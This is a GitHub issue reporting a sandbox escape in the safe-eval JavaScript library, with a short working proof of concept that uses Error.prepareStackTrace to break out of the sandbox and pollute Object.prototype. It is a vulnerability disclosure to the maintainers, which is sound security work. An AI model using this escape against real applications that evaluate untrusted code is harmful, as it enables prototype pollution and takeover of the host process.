New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Sandbox Escape Bug #28

Open

seongil-wi opened this issue Jan 2, 2023 · 0 comments

seongil-wi commented Jan 2, 2023

Hellow, we found sandbox escape vulnerability in the latest version of safe-eval

var safeEval = require('safe-eval')

let code = `
    (function() { 
        Error.prepareStackTrace = (_, c) => c.map(c => c.getThis()).find(a => a); 
        ret = (new Error()).stack;
        ret.__proto__.polluted = "ret.__proto__.polluted";
    })()
`
safeEval(code);

const polluted_result = {}["polluted"];
console.log(polluted_result);

The text was updated successfully, but these errors were encountered:

# for free to join this conversation on GitHub. Already have an account? # to comment